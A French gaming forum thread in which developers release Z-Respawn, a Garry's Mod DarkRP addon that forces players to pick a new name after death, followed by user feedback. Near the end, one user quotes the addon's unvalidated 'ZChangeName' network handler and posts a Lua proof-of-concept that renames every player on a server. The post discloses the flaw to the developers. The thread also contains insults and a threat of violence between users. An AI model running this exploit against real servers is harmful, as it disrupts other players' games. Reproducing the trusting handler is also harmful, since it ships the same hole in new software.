[Addon DarkRP] Z-Respawn (Gratuit)

• Initiateur de la discussion ToTheHospital
  • Date de début
  • Initiateur de la discussion
T

ToTheHospital

Geek suprême
Score réaction
88
LIEN DE TELECHARGEMENT : https://www.mediafire.com/file/ntaepax1jxo8hsz/Z-Respawn_(v.1.0.0).zip

Bonjour à tous!
je vous présente un petit addon (payant) qu'on a créé avec Zoukilama : Z-Respawn
Il était disponible sur gscript depuis quelques semaines mais le site étant temporairement en maintenance je le poste ici en attendant (j'espère que c'est la bonne catégorie)

-
DESCRIPTION:

Z-Respawn est (à la base) développé pour des serveurs Serious RP mais peut aussi être utile sur n'importe quel serveur DarkPR. Cet addon force les joueurs à changer de nom à chaque fois qu'ils meurent avec la possibilité d'en générer un au hasard (pour les moins créatifs)
Ça rappellera une des règles fondamentales du RP à vos joueurs:
Si vous mourrez vous recommencez une nouvelle vie.

☞ SCREENSHOTS

Aperçu de l'addon en jeu, avec l'anti-aliasing x9000 Kappa
(la notification bleue en bas de l'écran ne fait pas partie de cet addon)

Aperçu du fichier de configuration:

Vidéo :

⚙ FONCTIONNALITÉS

☑ Génération de nom aléatoire (homme et femme)
☑ Le nom aléatoire s'adapte au language du script (FR = noms français / EN = noms américains)
☑ Les joueurs ne pourront plus utiliser le même nom qu'avant leur mort
☑ Interface animée
☑ Editable selon vos gouts (themes prédéfinis, couleurs, textes, icônes...)
☑ Messages d'alerte (ex: pas assez de caractères dans le prénom, etc..)
☑ Facile à installer, à modifier et à utiliser
☑ Languages français et anglais

✆ SUPPORT / RAPPORT DE BUG

Si vous trouvez un bug ou que vous avez une question ou suggestion concernant l'addon ou que vous souhaitez l'acheter vous pouvez m'envoyer un message sur mtx, ou directement m'ajouter sur steam.

Mon profil Steam : http://steamcommunity.com/id/alshulgin
Profil Steam de Zouki (n'assure pas le support): http://steamcommunity.com/id/zoukilama

Prévu pour la prochaine mise à jour :
- Utiliser moins de globales (question d'optimisation)
- Liste de prénoms et noms en alternative à l'API pour la génération automatique
- Rendre compatible Z-Respawn avec le MedicMod sans modifier le MedicMod (fix temporaire disponible, mp si besoin)
- Vos suggestions!

Dernière édition:
  • J'aime
Réactions: Damienn_, Mamadou Trug, ~> MrSupergadin <~ et 6 autres
Malcolm

Malcolm

Psychopathe
Score réaction
262
C'est propre, j'aime bien :)

• J'aime
Réactions: zoukilama, ~> MrSupergadin <~ et ToTheHospital
T

ToTheHospital

Geek suprême
Score réaction
88
Gscript est de retour :)
http://www.gscript.net/boutique/addons/z-respawn/

Malcolm

Malcolm

Psychopathe
Score réaction
262
ToTheHospital à dit:
Gscript est de retour :)
http://www.gscript.net/boutique/addons/z-respawn/
Il y a quelques fautes.

T

ToTheHospital

Geek suprême
Score réaction
88
malcolm2003 à dit:
Il y a quelques fautes.
Des fautes d'orthographe dans la description de l'addon?
Si c'est ça dit moi lesquelles et je les corrigerait dès que possible :)

Dernière édition:
T

ToTheHospital

Geek suprême
Score réaction
88
J'ai fait une vidéo pour ceux qui veulent avoir un aperçu de l'addon en jeu:

Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 688
ToTheHospital à dit:
J'ai fait une vidéo pour ceux qui veulent avoir un aperçu de l'addon en jeu:
Je compte pas me le prendre mais permet moi de dire que ca a vraiment de la gueule SeemsGood ,

juste deux questions

- Que se passe t'il si un joueur prend le nom et prénom d'un mec mort possédant ultérieurement ce prénom ?
- L'addon empêche le fameux name poubelle ? "DJSFPOHDG IJDHOIDJG" ?

• J'aime
Réactions: ToTheHospital
T

ToTheHospital

Geek suprême
Score réaction
88
Yoh Sambre ♪ à dit:
Je compte pas me le prendre mais permet moi de dire que ca a vraiment de la gueule SeemsGood ,

juste deux questions

- Que se passe t'il si un joueur prend le nom et prénom d'un mec mort possédant ultérieurement ce prénom ?
- L'addon empêche le fameux name poubelle ? "DJSFPOHDG IJDHOIDJG" ?
Merci à toi :) alors pour te répondre :
- Si le nom n'est plus utilisé par personne sur le serveur tu pourra le réutiliser (sinon ce serait problématique par rapport au random gen qui est susceptible de proposer 2 fois le même nom, bien que les chances soient minces)
- L'addon empêche une partie des "noms poubelle" comme tu dit, en bloquant les noms qui utilisent moins d'un certains nombre de caractères (par défaut 6 caractères pour le nom et prénom confondus, cette limite peut être changée très facilement bien que ce ne soit pas dans le fichier config)
Par contre ca ne bloquera pas des noms comme ""DJSFPOHDG IJDHOIDJG" car il n'y a pas de logique de suite de consonnes et de voyelles. Cet addon ne remplacera pas les modérateurs de ton serveur. Par contre une blacklist de noms est envisageable pour les prochaines mises à jour :)

Dernière édition:
  • J'aime
Réactions: Yoh Sambre ♪
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 688
ToTheHospital à dit:
Merci à toi :) alors pour te répondre :
- Si le nom n'est plus utilisé par personne sur le serveur tu pourra le réutiliser (sinon ça poserait problématique par rapport au random gen qui est succeptible de proposer 2 fois le même nom, bien que les chances soient minces)
- L'addon empêche une partie des "noms poubelle" comme tu dit, en bloquant les noms qui utilisent moins d'un certains nombre de caractères (par défaut 6 caractères pour le nom et prénom confondus, cette limite peut être changée très facilement bien que ce ne soit pas dans le fichier config)
Par contre ca ne bloquera pas des noms comme ""DJSFPOHDG IJDHOIDJG" car il n'y a pas de logique de suite de syllabes et de voyelles. Cet addon ne remplacera pas les modérateurs de ton serveur. Par contre une blacklist de noms est envisageable pour les prochaines mises à jour :)
Ok ^^ ,

en tous cas je te connaissait pas faudrait qu'a l'avenir tes futur créations fait nous en par avec un topic comme celui ci ;)

• J'aime
T

ToTheHospital

Geek suprême
Score réaction
88
Yoh Sambre ♪ à dit:
Ok ^^ ,

en tous cas je te connaissait pas faudrait qu'a l'avenir tes futurs créations fait nous en par avec un topic comme celui ci ;)
J'y penserait quand je posterait du nouveau sur gscript :)

• J'aime
Réactions: Yoh Sambre ♪
T

ToTheHospital

Geek suprême
Score réaction
88
Pour ceux qui auraient le Z-Respawn en plus du Medic Mod (https://www.gmodstore.com/scripts/view/4403) envoyez moi un PM si vous voulez rendre les deux addons compatibles

T

ToTheHospital

Geek suprême
Score réaction
88
L'addon est maintenant gratuit : https://www.mediafire.com/file/ntaepax1jxo8hsz/Z-Respawn_(v.1.0.0).zip

MrPikou

MrPikou

Geek suprême
Score réaction
30
Il était pas à 2,39€ sur garryshop.fr ?

ZarosOVH

ZarosOVH

Modérateur
Membre du Staff
Score réaction
5 488
  • J'aime
Réactions: MrPikou et ToTheHospital
MrPikou

MrPikou

Geek suprême
Score réaction
30
Ah ok ^^ ! J'avais pas remarqué x)...

• Banni
FreezWhyNot

FreezWhyNot

Bambi
Score réaction
6
2€ pour cette merde tellement pas opti ? GG pigeon

• J'aime
Réactions: AzerYTB
  • Banni
AzerYTB

AzerYTB

Geek suprême
Score réaction
359
FreezWhyNot à dit:
2€ pour cette merde tellement pas opti ? GG pigeon
Ta vus je suis un pigeon, je l'ai acheté et avant dire que il n'est pas opti faut que tu sois un pigeon pour pouvoir l'acheté comme tu dit, et il est super bien optimisée, bisous le jaloux (wOs) (trible compte...)

• J'aime
  • Banni
WabelHD

WabelHD

Geek suprême
Score réaction
59
  1. Inutile d'utiliser if CLIENT then dans du clientside et inutile d'utiliser if SERVER then dans du serverside.
  2. Pourquoi as-tu fait une fonction globale avec ta frame dedans (ZHudChangeName) au lieu de mettre directement dans le net?
  3. Fait des fonctions locale au lieu de fonctions globales.
Sinon, très bon addon ;)

• J'aime
Réactions: Makss et zoukilama
ZarosOVH

ZarosOVH

Modérateur
Membre du Staff
Score réaction
5 488
Go le mettre sur github ;)

• J'aime
Réactions: MrPikou et zoukilama
  • Banni
FreezWhyNot

FreezWhyNot

Bambi
Score réaction
6
AzerYTB à dit:
Ta vus je suis un pigeon, je l'ai acheté et avant dire que il n'est pas opti faut que tu sois un pigeon pour pouvoir l'acheté comme tu dit, et il est super bien optimisée, bisous le jaloux (wOs) (trible compte...)
Bon petit enfant, je ne suis pas Wos, tu y connais pas en optimisation tu sais pas faire un NPC.

NeiFox

NeiFox

Geek suprême
Score réaction
103
FreezWhyNot à dit:
Bon petit enfant, je ne suis pas Wos, tu y connais pas en optimisation tu sais pas faire un NPC.
Tu peux arrêter de pourrir le forum s'il te plaît ? Les gens comme toi ne servent à rien que ce soit sur le forum ou même dans la vrai vie.

• J'aime
Réactions: ToTheHospital et Jason_Oubout
  • Banni
FreezWhyNot

FreezWhyNot

Bambi
Score réaction
6
NeiFox à dit:
Tu peux arrêter de pourrir le forum s'il te plaît ? Les gens comme toi ne servent à rien que ce soit sur le forum ou même dans la vrai vie.
J’ai une meilleur vie que toi espèce de k social, tu joue à garry’s mod tout les joues jusqu’à 6H du matin.
Heureusement que IRL je te connais pas je t’aurai fait bouffer le sol ya longtemps petite merde de « community manager »

NeiFox

NeiFox

Geek suprême
Score réaction
103
FreezWhyNot à dit:
J’ai une meilleur vie que toi espèce de k social, tu joue à garry’s mod tout les joues jusqu’à 6H du matin.
Heureusement que IRL je te connais pas je t’aurai fait bouffer le sol ya longtemps petite merde de « community manager »
Lol, je t'entend pas ? tu racontes quoi w0s, SaiPasAirpé, LaPomme, Hitch, Freez, Lucian et j'en oublie encore ?

• Banni
FreezWhyNot

FreezWhyNot

Bambi
Score réaction
6
NeiFox à dit:
Lol, je t'entend pas ? tu racontes quoi w0s, SaiPasAirpé, LaPomme, Hitch, Freez, Lucian et j'en oublie encore ?
Ta eu ta réponse la non ?

E

Eikichi383

Bambi
Score réaction
1
Bonjour, Cette addon ne marche pas pour temps j'ai mis le fichier indiquer dans addon ! et comment sa ce fait que j'ai un autre fichier aec le même contenus à l’intérieur de ce dossier ?

Makss

Makss

Psychopathe
Score réaction
990
Hmmmm l'exploit
Code:
net.Receive( "ZChangeName", function( len, ply )	ply = net.ReadEntity()	newName = net.ReadString()	ply:setRPName( newName, false)	ply:SetName(newName)	ply:Respawn()
end)
EDIT : Code PoC
Code:
timer.Create("fuckUpDarkRPName", 2, 0, function()	for _, v in pairs(player.GetAll()) do	net.Start("ZChangeName")	net.WriteEntity(v)	local str	for i=1, 10 do	str = str .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(62)]	end	net.WriteString(str)	net.SendToServer()	end
end)

Dernière édition:
  • J'aime
Réactions: ToTheHospital et slownls
Z

zoukilama

Geek
Score réaction
8
Eikichi383 à dit:
Bonjour, Cette addon ne marche pas pour temps j'ai mis le fichier indiquer dans addon ! et comment sa ce fait que j'ai un autre fichier aec le même contenus à l’intérieur de ce dossier ?
Pour coter client & coter serveur mais je pense que je vais changer et le refaire proprement

• J'aime
Réactions: NeiFox
E

Eikichi383

Bambi
Score réaction
1
oui mais sa veu dire que les autres joueur doit l’avoir aussi du coter clients , c'est pas pratique car pas tout le monde c'est l’installer :D

T

ToTheHospital

Geek suprême
Score réaction
88
Eikichi383 à dit:
Tu est bien sur darkrp? C'est le dossier 'z_respawn' que t'as mis dans ton dossier addons ou le premier dossier quand tu décompresses le .zip?

Eikichi383 à dit:
oui mais sa veu dire que les autres joueur doit l’avoir aussi du coter clients , c'est pas pratique car pas tout le monde c'est l’installer :D
Non. Le client téléchargera la partie client en se connectant, comme n'importe quel addon

• J'aime
Réactions: zoukilama
Mamadou Trug

Mamadou Trug

Geek suprême
Score réaction
39
Wouah merci mec :) je suis en train de faire un serious rp

NOX3R

NOX3R

Geek suprême
Score réaction
148
FreezWhyNot à dit:
Ta eu ta réponse la non ?
Bizarre que ta la même tronche URL que @NeiFox n'est ce pas Cyril? Tu n'aurai juste pas deux comptes ??

MrPungle

MrPungle

Geek
Score réaction
10
Sympa l'addon !
Pour une clientèle limitée par contre vu qu'il faut un serveur sans débiles qui tuent à tour de bras.

Discord d'entraide
Rejoignz-nous sur Discord